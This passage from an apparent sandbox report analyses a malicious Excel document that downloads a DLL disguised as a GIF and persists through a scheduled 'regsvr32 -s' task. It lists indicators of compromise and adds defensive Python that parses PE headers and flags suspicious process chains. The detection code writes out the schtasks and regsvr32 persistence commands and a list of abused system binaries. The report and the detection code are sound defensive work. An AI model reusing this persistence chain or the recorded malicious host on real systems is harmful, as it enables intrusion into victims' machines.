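            findings.append("PE image dropped directly in a user profile root")
    return {"path": str(p), "is_pe": pe is not None,
            "is_dll": bool(pe and pe["is_dll"]),
            "bitness": pe["bitness"] if pe else None,
            "findings": findings}


def build_sample_pe(is_dll: bool, pe32plus: bool = False) -> bytes:
    """Synthetic minimal PE header (constructed test input, not a real binary)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header follows the DOS header
    characteristics = 0x0002 | (IMAGE_FILE_DLL if is_dll else 0)  # EXECUTABLE_IMAGE [| DLL]
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 1, 0, 0, 0, 2, characteristics)
    optional = struct.pack("<H", PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    return bytes(dos) + b"PE\0\0" + coff + optional


if __name__ == "__main__":
    # Constructed inputs labelled with the paths from this report.
    samples = {
        r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif": build_sample_pe(is_dll=True),
        r"C:\Users\user\iojhsfgv.dvers": build_sample_pe(is_dll=True),
        r"C:\Users\user\Pictures\real.gif": b"GIF89a" + bytes(32),   # constructed non-PE file
    }
    for path, blob in samples.items():
        print(triage(path, blob))
```

The parser stops at the optional-header magic on purpose: that is enough to separate "a GIF that is really a DLL" from a real image without trusting anything past the headers, and it is the same check a mail or web gateway can apply before the file ever reaches Excel.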

                      Unpacked PE Files

Source | Detection | Scanner | Label
4.2.rundll32.exe.8a0000.4.unpack | 100% | Avira | HEUR/AGEN.1108767

                      Domains

Source | Detection | Scanner | Label
tidymasters.com.au | 2% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
tidymasters.com.au | 103.50.162.157 | true | false | | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | rundll32.exe, 00000004.00000002.2108474827.0000000003620000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2371170734.00000000022D0000.00000002.00000001.sdmp, taskeng.exe, 00000009.00000002.2370918414.0000000000840000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2116197122.0000000000D40000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | rundll32.exe, 00000004.00000002.2108474827.0000000003620000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2371170734.00000000022D0000.00000002.00000001.sdmp, taskeng.exe, 00000009.00000002.2370918414.0000000000840000.00000002.00000001.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | false | | high
http://servername/isapibackend.dll | regsvr32.exe, 0000000A.00000002.2117402574.0000000000A30000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmp | false | | high

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
103.50.162.157 | tidymasters.com.au | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:382839
                                    Start date:06.04.2021
                                    Start time:18:39:46
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 39s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:document-1055791644.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@18/14@1/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 50.7% (good quality ratio 49.8%)
                                    • Quality average: 87%
                                    • Quality standard deviation: 22.1%
                                    HCA Information:
                                    • Successful, ratio: 78%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xls
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 192.35.177.64, 205.185.216.42, 205.185.216.10, 2.20.142.209, 2.20.142.210
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, apps.digsigtrust.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.

                                    Simulations

                                    Behavior and APIs

Time | Type | Description
18:40:46 | API Interceptor | 18x Sleep call for process: rundll32.exe modified
18:40:48 | API Interceptor | 410x Sleep call for process: explorer.exe modified
18:40:52 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
18:40:53 | Task Scheduler | Run new task: wwzkbggu path: regsvr32.exe s>-s "C:\Users\user\iojhsfgv.dvers"
18:40:53 | API Interceptor | 419x Sleep call for process: taskeng.exe modified
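The chain this report records (Excel spawning rundll32, the injected explorer.exe creating task wwzkbggu, and taskeng.exe later running regsvr32.exe -s on a PE with a made-up extension in the user profile root) is exactly what a process-creation rule set should catch, independent of the file hashes. The following Python is an added example and not part of the Joe Sandbox report: it runs three checks over process-creation records (parent image, image, command line, modelled on Sysmon Event ID 1 fields). The records are constructed for the example; the report gives the task name, the regsvr32 arguments and the parent/child relationships but not the exact schtasks or rundll32 command lines, so those are assumptions.

```python
from __future__ import annotations
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "cmd.exe", "powershell.exe", "certutil.exe"}
MODULE_EXTS = {".dll", ".ocx", ".ax", ".cpl"}   # what regsvr32 is normally asked to register


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _tokens(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring "..." and '...' quoting."""
    return [a or b or c for a, b, c in re.findall(r"\"([^\"]*)\"|'([^']*)'|(\S+)", cmdline)]


def check_regsvr32(cmdline: str) -> list[str]:
    """Flag regsvr32 registering a module that is not a DLL by name or that lives under \\Users."""
    toks = _tokens(cmdline)
    if not toks or _name(toks[0]) != "regsvr32.exe":
        return []
    mode = "silent " if any(t.lower() in ("/s", "-s") for t in toks[1:]) else ""
    out = []
    for arg in toks[1:]:
        if arg.startswith(("/", "-")):
            continue
        p = PureWindowsPath(arg)
        if p.suffix.lower() not in MODULE_EXTS:
            out.append(f"{mode}regsvr32 of module with non-DLL extension: {arg}")
        if len(p.parts) >= 3 and p.parts[1].lower() == "users":
            out.append(f"{mode}regsvr32 of module under a user profile: {arg}")
    return out


def check_schtasks(cmdline: str) -> list[str]:
    """Flag schtasks /Create whose /tr action is a suspicious regsvr32 (or any LOLBin) launch."""
    if not re.search(r"/create\b", cmdline, re.I):
        return []
    tn = re.search(r'/tn\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    name = (tn.group(1) or tn.group(2)) if tn else "?"
    # The action is usually quoted and may carry \" escaped quotes around its own path.
    m = re.search(r'/tr\s+"((?:\\.|[^"\\])*)"', cmdline, re.I) or re.search(r"/tr\s+(\S+)", cmdline, re.I)
    if not m:
        return []
    action = m.group(1).replace('\\"', '"')
    out = [f"scheduled task '{name}': {f}" for f in check_regsvr32(action)]
    toks = _tokens(action)
    if not out and toks and _name(toks[0]) in LOLBINS:
        out.append(f"scheduled task '{name}' runs {toks[0]}")
    return out


def analyze(events: list[tuple[str, str, str]]) -> list[tuple[int, str]]:
    """events: (parent image, image, command line). Returns (event index, finding) pairs."""
    results = []
    for i, (parent, image, cmd) in enumerate(events):
        findings = []
        if _name(parent) in OFFICE_PARENTS and _name(image) in LOLBINS:
            findings.append(f"{_name(parent)} spawned {_name(image)}")
        if _name(image) == "regsvr32.exe":
            findings += check_regsvr32(cmd)
        elif _name(image) == "schtasks.exe":
            findings += check_schtasks(cmd)
        results += [(i, f) for f in findings]
    return results


# Constructed records modelled on this report's process tree (command lines are assumed).
EVENTS = [
    (r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", r"C:\Windows\SysWOW64\rundll32.exe",
     r'rundll32.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif",DllRegisterServer'),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\schtasks.exe",
     r'schtasks.exe /Create /tn wwzkbggu /tr "regsvr32.exe -s \"C:\Users\user\iojhsfgv.dvers\"" /SC ONCE /ST 18:42'),
    (r"C:\Windows\System32\taskeng.exe", r"C:\Windows\SysWOW64\regsvr32.exe",
     r"regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'"),
    (r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\regsvr32.exe",      # benign control
     r'regsvr32.exe /s "C:\Windows\System32\mshtml.dll"'),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign control
]

if __name__ == "__main__":
    for idx, finding in analyze(EVENTS):
        print(f"event {idx}: {finding}")
```

The schtasks check re-parses the /tr action through the same regsvr32 logic rather than matching the string "regsvr32", so a task that hides the same module behind a different extension or path still trips the rule, while the installer-style regsvr32 /s of a System32 DLL in the control record stays quiet.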

                                    Joe Sandbox View / Context

                                    IPs

Match | Associated Sample Name / URL | Detection | Context
103.50.162.157 | http://www.stevegoadart.com/INCORRECT-INVOICE/ | malicious | credibleinteriors.in/nxcPA/
103.50.162.157 | Invoice Number 750084.doc | malicious | credibleinteriors.in/nxcPA/
103.50.162.157 | Invoice Number 750084.doc | malicious | credibleinteriors.in/nxcPA/

                                    Domains

Match | Associated Sample Name / URL | Detection | Context
tidymasters.com.au | contract (39).xls | malicious | 103.50.162.157

                                    ASN

Match | Associated Sample Name / URL | Detection | Context
PUBLIC-DOMAIN-REGISTRYUS | documents-1660683173.xlsm | malicious | 111.118.215.222
PUBLIC-DOMAIN-REGISTRYUS | swift Copy.xls.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | document-1848152474.xlsm | malicious | 199.79.62.99
PUBLIC-DOMAIN-REGISTRYUS | FN vw Safety 1 & 2.exe | malicious | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | MV TBN.uslfze.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | purchase order.exe | malicious | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | AD1-2001028L.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | AD1-2001028L (2).exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | document-1048628209.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-1771131239.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-1370071295.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-69564892.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-1320073816.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-184653858.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-1729033050.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-1268722929.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-540475316.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-1456634656.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-12162673.xls | malicious | 5.100.155.169
PUBLIC-DOMAIN-REGISTRYUS | document-997754822.xls | malicious | 5.100.155.169

                                    JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
7dcce5b76c8b17472d024758970a406b | final po PP-11164.ppt | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | OrderSheet.pps | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1848152474.xlsm | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | appraisal document.doc | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1048628209.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1771131239.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1370071295.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-69564892.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1320073816.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-184653858.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1729033050.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1268722929.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-540475316.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1456634656.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-12162673.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-997754822.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1376447212.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1813856412.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1776123548.xls | malicious | 103.50.162.157
7dcce5b76c8b17472d024758970a406b | document-1201008736.xls | malicious | 103.50.162.157

                                    Dropped Files

Match | Associated Sample Name / URL | Detection | Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif | contract (39).xls | malicious |
C:\Users\user\iojhsfgv.dvers | contract (39).xls | malicious |

                                        Created / dropped Files

                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                        Category:dropped
                                        Size (bytes):58596
                                        Entropy (8bit):7.995478615012125
                                        Encrypted:true
                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                        MD5:61A03D15CF62612F50B74867090DBE79
                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                        Malicious:false
                                        Reputation:high, very likely benign file
Preview: MSCF ... authroot.stl ... (remainder is binary cabinet content and is omitted)
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):893
                                        Entropy (8bit):7.366016576663508
                                        Encrypted:false
                                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                        Malicious:false
                                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):326
                                        Entropy (8bit):3.129251112301174
                                        Encrypted:false
                                        SSDEEP:6:kKv4skwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:X4skwTJrkPlE99SNxAhUe0ht
                                        MD5:6F5D58912EFB7858B30F1B182AF23A51
                                        SHA1:521C6ED36CBBD5068CB8825241792BE5F51DF647
                                        SHA-256:D41CB8811B9B6111C126A072135A1BF31E4C8B1ECE07E6D8C9044D1A153BD5AB
                                        SHA-512:FB81A3F381FE17153448331F27179A10126C11F9145E875E798FF1A56D476C7F59690B4CAB1E07BACEF63898AE7515C325A80FD2BEBD80A1D323328F8C3DB525
                                        Malicious:false
                                        Preview: p...... ........]...O+..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):252
                                        Entropy (8bit):3.018531379206123
                                        Encrypted:false
                                        SSDEEP:3:kkFklu+lltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK1unliBAIdQZV7eAYLit
                                        MD5:C7FB7A4D96D51871E4FFB2D3001E9449
                                        SHA1:C4D99D1B382736FFE3AB08D1252E5DF51834FF5F
                                        SHA-256:B801B877383A6E165445A6DD99B2DFB3FC39BAACB53DC6DFC057C6CDC4AB035E
                                        SHA-512:3DF0CBE88D7B843B8300298585BC5E8E3B7FC64EF0C79A1F7B651057DA86E1997DBDFD11BD1B4B222B2083C23792273A542AD30679563DDBD3A344AF9788EF34
                                        Malicious:false
                                        Preview: p...... ....`...u..O+..(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:downloaded
                                        Size (bytes):701440
                                        Entropy (8bit):6.569729430445502
                                        Encrypted:false
                                        SSDEEP:12288:4OVZl+VL/X2ogyxiVIHOa5sgGSg6dEE9SXrFyoCq:3flS/XkySYL/GSg639SXr9
                                        MD5:0782295F04B54D341792BFA0E4396AA7
                                        SHA1:342875D35F1FA21F6C313BD76DB911BF90953129
                                        SHA-256:63B470971FA827F8E59555C32E966B68EE765120849C23431DD352AEACBBA52B
                                        SHA-512:3F1DE9373CF390AFFE49578A35E5B48C6E8220EA95F85E3A51F81083300869E1E47B79E95D562D6095929FD79712F8D9DFD7D3B17E310A1A1A89541C18B6A3D0
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Metadefender, Detection: 30%
                                        • Antivirus: ReversingLabs, Detection: 93%
                                        Joe Sandbox View:
                                        • Filename: contract (39).xls, Detection: malicious
                                        IE Cache URL:https://tidymasters.com.au/ds/0702.gif
                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................P...`......._.......`....@.................................................................................. ...........................c..................................................................................CODE.....O.......P.................. ..`DATA....(....`.......T..............@...BSS.....5............h...................idata........... ...h..............@....reloc...c.......d..................@..P.rsrc........ ......................@..P....................................@..P........................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\06DE0000
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):304489
                                        Entropy (8bit):7.987681872375293
                                        Encrypted:false
                                        SSDEEP:6144:JerFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MX:JeFPM8R3AsB+bjej/9co
                                        MD5:8F704F373C6918FC3C81A9DC7D8C2C2D
                                        SHA1:51033750C855A05F0E404B9CAE73EDBC5238B5D0
                                        SHA-256:B6DAB8A2F6B99817F1EF5060AA2778C25C5BD6CBC729D3F94802115ED29465B6
                                        SHA-512:E738F21700DB5DCE8DBC0E7D825C5E60001F008332002EB1266B868C1D4DA352969576912B00CFE8ADA5550404FEFDE5911AF5D8DD58D18102229C42A7DA112E
                                        Malicious:false
                                        Preview: .T.n.0....?..........C....I?`L.%...a...;...5..Fr.B.-..........{q..D.^.m.._......^...{.E........0.S/...)I......*$.._. #.5.(?.f...>..m..b1..+x.........x.|.}W.z.1Z. .Q....H.V+.P........4.....&...s..H....G....e.4"..#..}..#k)4.H.8......9.q?......B.?.qZrc.SH.e...<I..Q......u.T.7...y...vxF."I....H....?.RI%..Q}_j.P...L...e....J3!Hyk..8.......].........>t..bA..^.....O..."..Jxy..^.md"L...O..A....G3..8.Oh.:..........PK..........!.I$ON............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\CabE310.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                        Category:dropped
                                        Size (bytes):58596
                                        Entropy (8bit):7.995478615012125
                                        Encrypted:true
                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                        MD5:61A03D15CF62612F50B74867090DBE79
                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                        Malicious:false
                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                        C:\Users\user\AppData\Local\Temp\TarE311.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):152788
                                        Entropy (8bit):6.309740459389463
                                        Encrypted:false
                                        SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                        MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                        SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                        SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                        SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                        Malicious:false
                                        Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
